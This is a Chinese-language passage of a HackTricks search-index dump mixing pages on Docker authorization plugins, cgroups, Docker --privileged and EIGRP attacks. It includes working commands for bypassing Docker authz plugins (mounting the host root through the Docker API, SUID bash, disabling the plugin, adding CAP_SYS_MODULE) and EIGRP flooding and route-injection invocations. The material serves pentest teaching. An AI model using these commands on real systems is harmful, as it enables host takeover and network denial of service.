HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » AppArmor Shebang Bypass","id":"1587","title":"AppArmor Shebang Bypass"},"1588":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 Docker 的开箱即用 授权 模型是 全有或全无 。任何有权限访问 Docker 守护进程的用户都可以 运行任何 Docker 客户端 命令 。使用 Docker 的引擎 API 联系守护进程的调用者也是如此。如果您需要 更严格的访问控制 ,可以创建 授权插件 并将其添加到 Docker 守护进程配置中。使用授权插件,Docker 管理员可以 配置细粒度访问 策略来管理对 Docker 守护进程的访问。 Docker Auth 插件是 外部 插件 ,您可以用它们来 允许/拒绝 请求到 Docker 守护进程的 操作 ,这取决于请求的 用户 和 请求的操作 。 以下信息来自文档 当通过 CLI 或引擎 API 向 Docker 守护进程 发出 HTTP 请求 时, 身份验证 子系统 会将请求传递给已安装的 身份验证 插件 。请求包含用户(调用者)和命令上下文。 插件 负责决定是否 允许 或 拒绝 请求。 下面的序列图描绘了允许和拒绝的授权流程: Authorization Allow flow Authorization Deny flow 每个发送到插件的请求 包括经过身份验证的用户、HTTP 头和请求/响应体 。只有 用户名 和 使用的身份验证方法 被传递给插件。最重要的是, 不 会传递用户 凭据 或令牌。最后, 并非所有请求/响应体都会发送 到授权插件。只有那些 Content-Type 为 text/* 或 application/json 的请求/响应体会被发送。 对于可能劫持 HTTP 连接的命令(HTTP Upgrade),如 exec,授权插件仅在初始 HTTP 请求时被调用。一旦插件批准命令,后续流程不再应用授权。具体来说,流数据不会传递给授权插件。对于返回分块 HTTP 响应的命令,如 logs 和 events,仅 HTTP 请求会发送到授权插件。 在请求/响应处理过程中,一些授权流程可能需要对 Docker 守护进程进行额外查询。为了完成这些流程,插件可以像普通用户一样调用守护进程 API。为了启用这些额外查询,插件必须提供管理员配置适当身份验证和安全策略的手段。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 基本架构","id":"1588","title":"基本架构"},"1589":{"body":"您负责将 插件 注册为 Docker 守护进程 启动 的一部分。您可以安装 多个插件并将它们链接在一起 。这个链可以是有序的。每个对守护进程的请求按顺序通过链。只有当 所有插件都授予访问 资源时,访问才会被授予。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 多个插件","id":"1589","title":"多个插件"},"159":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 这是在 https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 中曝光的攻击摘要。请查看以获取更多信息。","breadcrumbs":"Pentesting Network » EIGRP Attacks » EIGRP攻击","id":"159","title":"EIGRP攻击"},"1590":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 插件示例","id":"1590","title":"插件示例"},"1591":{"body":"插件 authz 允许您创建一个简单的 JSON 文件,插件将 读取 该文件以授权请求。因此,它使您能够非常轻松地控制哪些 API 端点可以访问每个用户。 这是一个示例,允许 Alice 和 Bob 创建新容器:{\\"name\\":\\"policy_3\\",\\"users\\":[\\"alice\\",\\"bob\\"],\\"actions\\":[\\"container_create\\"]} 在页面 route_parser.go 中,您可以找到请求的 URL 与操作之间的关系。在页面 types.go 中,您可以找到操作名称与操作之间的关系。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » Twistlock AuthZ Broker","id":"1591","title":"Twistlock AuthZ Broker"},"1592":{"body":"您可以在这里找到一个 易于理解的插件 ,其中包含有关安装和调试的详细信息: https://github.com/carlospolop-forks/authobot 阅读 README 和 plugin.go 代码以了解其工作原理。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 简单插件教程","id":"1592","title":"简单插件教程"},"1593":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » Docker Auth 插件绕过","id":"1593","title":"Docker Auth 插件绕过"},"1594":{"body":"主要检查的内容是 哪些端点被允许 和 哪些 HostConfig 的值被允许 。 要执行此枚举,您可以 使用工具 https://github.com/carlospolop/docker_auth_profiler .","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 枚举访问","id":"1594","title":"枚举访问"},"1595":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 不允许的 run --privileged","id":"1595","title":"不允许的 run --privileged"},"1596":{"body":"bash docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 最小权限","id":"1596","title":"最小权限"},"1597":{"body":"在这种情况下,系统管理员 不允许用户挂载卷并使用 --privileged 标志运行容器 或给予容器任何额外的能力: bash docker run -d --privileged modified-ubuntu\\ndocker: Error response from daemon: authorization denied by plugin customauth: [DOCKER FIREWALL] Specified Privileged option value is Disallowed.\\nSee \'docker run --help\'. 然而,用户可以 在运行中的容器内创建一个 shell 并赋予其额外的权限 : bash docker run -d --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu\\n#bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de # Now you can run a shell with --privileged\\ndocker exec -it privileged bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de bash\\n# With --cap-add=ALL\\ndocker exec -it ---cap-add=ALL bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash\\n# With --cap-add=SYS_ADMIN\\ndocker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash 现在,用户可以使用任何 之前讨论过的技术 从容器中逃逸并在主机内部 提升权限 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 运行容器并获得特权会话","id":"1597","title":"运行容器并获得特权会话"},"1598":{"body":"在这种情况下,系统管理员 不允许用户使用--privileged标志运行容器 或给予容器任何额外的能力,他只允许挂载/tmp文件夹: bash host> cp /bin/bash /tmp #Cerate a copy of bash\\nhost> docker run -it -v /tmp:/host ubuntu:18.04 bash #Mount the /tmp folder of the host and get a shell\\ndocker container> chown root:root /host/bash\\ndocker container> chmod u+s /host/bash\\nhost> /tmp/bash\\n-p #This will give you a shell as root note 请注意,您可能无法挂载文件夹 /tmp,但您可以挂载一个 不同的可写文件夹 。您可以使用以下命令查找可写目录: find / -writable -type d 2>/dev/null 请注意,并非所有 Linux 机器上的目录都支持 suid 位! 要检查哪些目录支持 suid 位,请运行 mount | grep -v \\"nosuid\\"。例如,通常 /dev/shm、/run、/proc、/sys/fs/cgroup 和 /var/lib/lxcfs 不支持 suid 位。 还要注意,如果您可以 挂载 /etc 或任何其他 包含配置文件 的文件夹,您可以作为 root 从 docker 容器中更改它们,以便在主机上 滥用它们 并提升权限(可能修改 /etc/shadow)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 挂载可写文件夹","id":"1598","title":"挂载可写文件夹"},"1599":{"body":"配置此插件的系统管理员的责任是控制每个用户可以执行的操作及其权限。因此,如果管理员对端点和属性采取 黑名单 方法,他可能会 忘记一些 可能允许攻击者 提升权限 的端点。 您可以在 https://docs.docker.com/engine/api/v1.40/# 检查 docker API。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 未检查的 API 端点","id":"1599","title":"未检查的 API 端点"},"16":{"body":"HackTricks Github Stats tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"HackTricks » Github 统计","id":"16","title":"Github 统计"},"160":{"body":"目标 :通过向路由器发送EIGRP hello数据包来过载路由器CPU,可能导致拒绝服务(DoS)攻击。 工具 : helloflooding.py 脚本。 执行 : %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%% 参数 : --interface:指定网络接口,例如eth0。 --as:定义EIGRP自治系统编号,例如1。 --subnet:设置子网位置,例如10.10.100.0/24。","breadcrumbs":"Pentesting Network » EIGRP Attacks » 伪造EIGRP邻居攻击","id":"160","title":"伪造EIGRP邻居攻击"},"1600":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 未检查的 JSON 结构","id":"1600","title":"未检查的 JSON 结构"},"1601":{"body":"可能在系统管理员配置 docker 防火墙时,他 忘记了一些重要参数 ,例如 API 中的 \\" Binds \\"。 在以下示例中,可以利用此错误配置创建并运行一个挂载主机根目录(/)的容器: bash docker version #First, find the API version of docker, 1.40 in this example\\ndocker images #List the images available\\n#Then, a container that mounts the root folder of the host\\ncurl --unix-socket /var/run/docker.sock -H \\"Content-Type: application/json\\" -d \'{\\"Image\\": \\"ubuntu\\", \\"Binds\\":[\\"/:/host\\"]}\' http:/v1.40/containers/create\\ndocker start f6932bc153ad #Start the created privileged container\\ndocker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it\\n#You can access the host filesystem warning 注意在这个例子中,我们将 Binds 参数作为 JSON 的根级键使用,但在 API 中它出现在 HostConfig 键下。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 在根目录中的绑定","id":"1601","title":"在根目录中的绑定"},"1602":{"body":"按照与 根中的 Binds 相同的指示,向 Docker API 执行此 请求 : bash curl --unix-socket /var/run/docker.sock -H \\"Content-Type: application/json\\" -d \'{\\"Image\\": \\"ubuntu\\", \\"HostConfig\\":{\\"Binds\\":[\\"/:/host\\"]}}\' http:/v1.40/containers/create","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » HostConfig 中的 Binds","id":"1602","title":"HostConfig 中的 Binds"},"1603":{"body":"按照与 Binds in root 相同的指示,向 Docker API 执行此 request : bash curl --unix-socket /var/run/docker.sock -H \\"Content-Type: application/json\\" -d \'{\\"Image\\": \\"ubuntu-sleep\\", \\"Mounts\\": [{\\"Name\\": \\"fac36212380535\\", \\"Source\\": \\"/\\", \\"Destination\\": \\"/host\\", \\"Driver\\": \\"local\\", \\"Mode\\": \\"rw,Z\\", \\"RW\\": true, \\"Propagation\\": \\"\\", \\"Type\\": \\"bind\\", \\"Target\\": \\"/host\\"}]}\' http:/v1.40/containers/create","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » Mounts in root","id":"1603","title":"Mounts in root"},"1604":{"body":"按照与 Binds in root 相同的指示,向 Docker API 执行此 request : bash curl --unix-socket /var/run/docker.sock -H \\"Content-Type: application/json\\" -d \'{\\"Image\\": \\"ubuntu-sleep\\", \\"HostConfig\\":{\\"Mounts\\": [{\\"Name\\": \\"fac36212380535\\", \\"Source\\": \\"/\\", \\"Destination\\": \\"/host\\", \\"Driver\\": \\"local\\", \\"Mode\\": \\"rw,Z\\", \\"RW\\": true, \\"Propagation\\": \\"\\", \\"Type\\": \\"bind\\", \\"Target\\": \\"/host\\"}]}}\' http:/v1.40/containers/cre","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » Mounts in HostConfig","id":"1604","title":"Mounts in HostConfig"},"1605":{"body":"系统管理员在配置 docker 防火墙时, 可能忘记了某个参数的重要属性 ,例如 API 中的 \\" Capabilities \\" 在 \\" HostConfig \\" 内。以下示例中,可以利用此错误配置创建并运行具有 SYS_MODULE 能力的容器: bash docker version\\ncurl --unix-socket /var/run/docker.sock -H \\"Content-Type: application/json\\" -d \'{\\"Image\\": \\"ubuntu\\", \\"HostConfig\\":{\\"Capabilities\\":[\\"CAP_SYS_MODULE\\"]}}\' http:/v1.40/containers/create\\ndocker start c52a77629a9112450f3dedd1ad94ded17db61244c4249bdfbd6bb3d581f470fa\\ndocker ps\\ndocker exec -it c52a77629a91 bash\\ncapsh --print\\n#You can abuse the SYS_MODULE capability note HostConfig 通常是包含 有趣的 权限 的关键,可以用来逃离容器。然而,正如我们之前讨论的,注意在外部使用 Binds 也有效,并可能允许你绕过限制。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 未检查的 JSON 属性","id":"1605","title":"未检查的 JSON 属性"},"1606":{"body":"如果 sysadmin 忘记 禁止 禁用 插件 的能力,你可以利用这一点来完全禁用它! bash docker plugin list #Enumerate plugins # If you don’t have access to enumerate the plugins you can see the name of the plugin in the error output:\\ndocker: Error response from daemon: authorization denied by plugin authobot:latest: use of Privileged containers is not allowed.\\n# \\"authbolt\\" is the name of the previous plugin docker plugin disable authobot\\ndocker run --rm -it --privileged -v /:/host ubuntu bash\\ndocker plugin enable authobot 记得在提升权限后 重新启用插件 ,否则 重启docker服务将无效 !","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 禁用插件","id":"1606","title":"禁用插件"},"1607":{"body":"https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » Auth Plugin Bypass 文章","id":"1607","title":"Auth Plugin Bypass 文章"},"1608":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » CGroups » CGroups","id":"1608","title":"CGroups"},"1609":{"body":"Linux 控制组 ,或称 cgroups ,是 Linux 内核的一个特性,允许在进程组之间分配、限制和优先处理系统资源,如 CPU、内存和磁盘 I/O。它们提供了一种 管理和隔离资源使用 的机制,适用于资源限制、工作负载隔离和不同进程组之间的资源优先级等目的。 有 两个版本的 cgroups :版本 1 和版本 2。两者可以在系统上同时使用。主要区别在于 cgroups 版本 2 引入了 层次化的树状结构 ,使得在进程组之间进行更细致和详细的资源分配成为可能。此外,版本 2 还带来了各种增强功能,包括: 除了新的层次化组织,cgroups 版本 2 还引入了 其他几个变化和改进 ,例如对 新资源控制器 的支持、更好的遗留应用程序支持和性能提升。 总体而言,cgroups 版本 2 提供了更多功能和更好的性能 ,但在某些需要与旧系统兼容的场景中,仍然可以使用版本 1。 您可以通过查看 /proc/ 中的 cgroup 文件来列出任何进程的 v1 和 v2 cgroups。您可以通过以下命令开始查看您 shell 的 cgroups: shell-session $ cat /proc/self/cgroup\\n12:rdma:/\\n11:net_cls,net_prio:/\\n10:perf_event:/\\n9:cpuset:/\\n8:cpu,cpuacct:/user.slice\\n7:blkio:/user.slice\\n6:memory:/user.slice 5:pids:/user.slice/user-1000.slice/session-2.scope 4:devices:/user.slice\\n3:freezer:/\\n2:hugetlb:/testcgroup\\n1:name=systemd:/user.slice/user-1000.slice/session-2.scope\\n0::/user.slice/user-1000.slice/session-2.scope 输出结构如下: 数字 2–12 :cgroups v1,每行代表一个不同的 cgroup。控制器在数字旁边指定。 数字 1 :也是 cgroups v1,但仅用于管理目的(由例如 systemd 设置),并且没有控制器。 数字 0 :表示 cgroups v2。没有列出控制器,这一行仅在仅运行 cgroups v2 的系统上存在。 名称是层次结构的 ,类似于文件路径,指示不同 cgroups 之间的结构和关系。 像 /user.slice 或 /system.slice 的名称 指定了 cgroups 的分类,user.slice 通常用于由 systemd 管理的登录会话,而 system.slice 用于系统服务。","breadcrumbs":"Linux Privilege Escalation » Docker Security » CGroups » 基本信息","id":"1609","title":"基本信息"},"161":{"body":"目标 :通过注入虚假路由来干扰网络流量,导致流量被引导到一个不存在的目的地。 工具 : routeinject.py 脚本。 执行 : %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%% 参数 : --interface:指定攻击者的系统接口。 --as:定义EIGRP AS编号。 --src:设置攻击者的IP地址。 --dst:设置目标子网IP。 --prefix:定义目标子网IP的掩码。","breadcrumbs":"Pentesting Network » EIGRP Attacks » EIGRP黑洞攻击","id":"161","title":"EIGRP黑洞攻击"},"1610":{"body":"文件系统通常用于访问 cgroups ,与传统用于内核交互的 Unix 系统调用接口不同。要调查 shell 的 cgroup 配置,应检查 /proc/self/cgroup 文件,该文件显示 shell 的 cgroup。然后,通过导航到 /sys/fs/cgroup (或 /sys/fs/cgroup/unified )目录并找到一个与 cgroup 名称相同的目录,可以观察与 cgroup 相关的各种设置和资源使用信息。 Cgroup Filesystem cgroups 的关键接口文件以 cgroup 为前缀。 cgroup.procs 文件可以使用标准命令如 cat 查看,列出 cgroup 中的进程。另一个文件 cgroup.threads 包含线程信息。 Cgroup Procs 管理 shell 的 cgroups 通常包含两个控制器,用于调节内存使用和进程数量。要与控制器交互,应参考带有控制器前缀的文件。例如, pids.current 将被引用以确定 cgroup 中的线程数量。 Cgroup Memory 值中 max 的指示表明 cgroup 没有特定限制。然而,由于 cgroups 的层次结构,限制可能由目录层次结构中较低级别的 cgroup 强加。","breadcrumbs":"Linux Privilege Escalation » Docker Security » CGroups » 查看 cgroups","id":"1610","title":"查看 cgroups"},"1611":{"body":"通过 将其进程 ID (PID) 写入 cgroup.procs 文件 将进程分配给 cgroups。这需要 root 权限。例如,要添加一个进程: bash echo [pid] > cgroup.procs 同样, 修改 cgroup 属性,例如设置 PID 限制 ,是通过将所需值写入相关文件来完成的。要为 cgroup 设置最多 3,000 个 PID: bash echo 3000 > pids.max 创建新的 cgroups 涉及在 cgroup 层次结构中创建一个新的子目录,这会提示内核自动生成必要的接口文件。尽管没有活动进程的 cgroups 可以使用 rmdir 删除,但要注意某些限制: 进程只能放置在叶子 cgroups 中 (即层次结构中最嵌套的那些)。 一个 cgroup 不能拥有其父级中缺失的控制器 。 子 cgroups 的控制器必须在 cgroup.subtree_control 文件中显式声明 。例如,要在子 cgroup 中启用 CPU 和 PID 控制器: bash echo \\"+cpu +pids\\" > cgroup.subtree_control root cgroup 是这些规则的一个例外,允许直接放置进程。这可以用来将进程从 systemd 管理中移除。 监控 cgroup 内的 CPU 使用情况 可以通过 cpu.stat 文件实现,该文件显示总的 CPU 时间消耗,有助于跟踪服务的子进程的使用情况: cpu.stat 文件中显示的 CPU 使用统计信息","breadcrumbs":"Linux Privilege Escalation » Docker Security » CGroups » 操作和创建 cgroups","id":"1611","title":"操作和创建 cgroups"},"1612":{"body":"书籍:Linux 工作原理,第 3 版:每个超级用户应该知道的内容,作者:Brian Ward tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » CGroups » References","id":"1612","title":"References"},"1613":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » Docker --privileged","id":"1613","title":"Docker --privileged"},"1614":{"body":"当你以特权模式运行容器时,你正在禁用以下保护:","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 影响因素","id":"1614","title":"影响因素"},"1615":{"body":"在特权容器中,所有的 设备可以在 /dev/ 中访问 。因此,你可以通过 挂载 主机的磁盘来 逃逸 。 Inside default container\\nInside Privileged Container bash # docker run --rm -it alpine sh\\nls /dev\\nconsole fd mqueue ptmx random stderr stdout urandom\\ncore full null pts shm stdin tty zero bash # docker run --rm --privileged -it alpine sh\\nls /dev\\ncachefiles mapper port shm tty24 tty44 tty7\\nconsole mem psaux stderr tty25 tty45 tty8\\ncore mqueue ptmx stdin tty26 tty46 tty9\\ncpu nbd0 pts stdout tty27 tty47 ttyS0\\n[...]","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 挂载 /dev","id":"1615","title":"挂载 /dev"},"1616":{"body":"内核文件系统为进程提供了一种修改内核行为的机制。然而,对于容器进程,我们希望防止它们对内核进行任何更改。因此,我们在容器内将内核文件系统挂载为 只读 ,确保容器进程无法修改内核。 Inside default container\\nInside Privileged Container bash # docker run --rm -it alpine sh\\nmount | grep \'(ro\'\\nsysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)\\ncpuset on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpuset)\\ncpu on /sys/fs/cgroup/cpu type cgroup (ro,nosuid,nodev,noexec,relatime,cpu)\\ncpuacct on /sys/fs/cgroup/cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,cpuacct) bash # docker run --rm --privileged -it alpine sh\\nmount | grep \'(ro\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 只读内核文件系统","id":"1616","title":"只读内核文件系统"},"1617":{"body":"/proc 文件系统是选择性可写的,但出于安全原因,某些部分通过用 tmpfs 进行覆盖而屏蔽了写入和读取访问,确保容器进程无法访问敏感区域。 [!NOTE] > tmpfs 是一个将所有文件存储在虚拟内存中的文件系统。tmpfs 不会在你的硬盘上创建任何文件。因此,如果你卸载一个 tmpfs 文件系统,里面的所有文件将永远丢失。 Inside default container\\nInside Privileged Container bash # docker run --rm -it alpine sh\\nmount | grep /proc.*tmpfs\\ntmpfs on /proc/acpi type tmpfs (ro,relatime)\\ntmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)\\ntmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755) bash # docker run --rm --privileged -it alpine sh\\nmount | grep /proc.*tmpfs","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 遮蔽内核文件系统","id":"1617","title":"遮蔽内核文件系统"},"1618":{"body":"容器引擎以 有限的能力 启动容器,以控制容器内部的操作。 特权 容器具有 所有 可用的 能力 。要了解能力,请阅读: Linux Capabilities Inside default container\\nInside Privileged Container bash # docker run --rm -it alpine sh\\napk add -U libcap; capsh --print\\n[...]\\nCurrent: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=eip\\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap\\n[...] bash # docker run --rm --privileged -it alpine sh\\napk add -U libcap; capsh --print\\n[...]\\nCurrent: =eip cap_perfmon,cap_bpf,cap_checkpoint_restore-eip\\nBounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read\\n[...] 您可以通过使用 --cap-add 和 --cap-drop 标志来操控容器可用的能力,而无需以 --privileged 模式运行。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » Linux capabilities","id":"1618","title":"Linux capabilities"},"1619":{"body":"Seccomp 对于 限制 容器可以调用的 syscalls 非常有用。默认情况下,在运行 docker 容器时启用默认的 seccomp 配置文件,但在特权模式下它是禁用的。有关 Seccomp 的更多信息,请访问: Seccomp Inside default container\\nInside Privileged Container bash # docker run --rm -it alpine sh\\ngrep Seccomp /proc/1/status\\nSeccomp:\\t2\\nSeccomp_filters:\\t1 bash # docker run --rm --privileged -it alpine sh\\ngrep Seccomp /proc/1/status\\nSeccomp:\\t0\\nSeccomp_filters:\\t0 bash # You can manually disable seccomp in docker with\\n--security-opt seccomp=unconfined 另外,请注意,当在 Kubernetes 集群中使用 Docker(或其他 CRI)时, seccomp 过滤器默认是禁用的 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » Seccomp","id":"1619","title":"Seccomp"},"162":{"body":"目标 :通过注入更改的K值在EIGRP域内创建持续的中断和重新连接,最终导致DoS攻击。 工具 : relationshipnightmare.py 脚本。 执行 : %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%% 参数 : --interface:指定网络接口。 --as:定义EIGRP AS编号。 --src:设置合法路由器的IP地址。","breadcrumbs":"Pentesting Network » EIGRP Attacks » 滥用K值攻击","id":"162","title":"滥用K值攻击"},"1620":{"body":"AppArmor 是一种内核增强,用于将 容器 限制在 有限 的 资源 集合中,具有 每个程序的配置文件 。当您使用 --privileged 标志运行时,此保护将被禁用。 AppArmor bash # You can manually disable seccomp in docker with\\n--security-opt apparmor=unconfined","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » AppArmor","id":"1620","title":"AppArmor"},"1621":{"body":"运行带有 --privileged 标志的容器会禁用 SELinux 标签 ,使其继承容器引擎的标签,通常为 unconfined,从而授予与容器引擎相似的完全访问权限。在无根模式下,它使用 container_runtime_t,而在根模式下,应用 spc_t。 SELinux bash # You can manually disable selinux in docker with\\n--security-opt label:disable","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » SELinux","id":"1621","title":"SELinux"},"1622":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 什么不受影响","id":"1622","title":"什么不受影响"},"1623":{"body":"命名空间 不受 --privileged标志的影响。尽管它们没有启用安全约束,但它们 并不能看到系统或主机网络上的所有进程,例如 。用户可以通过使用**--pid=host、--net=host、--ipc=host、--uts=host**容器引擎标志来禁用单个命名空间。 Inside default privileged container\\nInside --pid=host Container bash # docker run --rm --privileged -it alpine sh\\nps -ef\\nPID USER TIME COMMAND\\n1 root 0:00 sh\\n18 root 0:00 ps -ef bash # docker run --rm --privileged --pid=host -it alpine sh\\nps -ef\\nPID USER TIME COMMAND\\n1 root 0:03 /sbin/init\\n2 root 0:00 [kthreadd]\\n3 root 0:00 [rcu_gp]ount | grep /proc.*tmpfs\\n[...]","breadcrumbs":"Linux Privilege Escalation » Docker 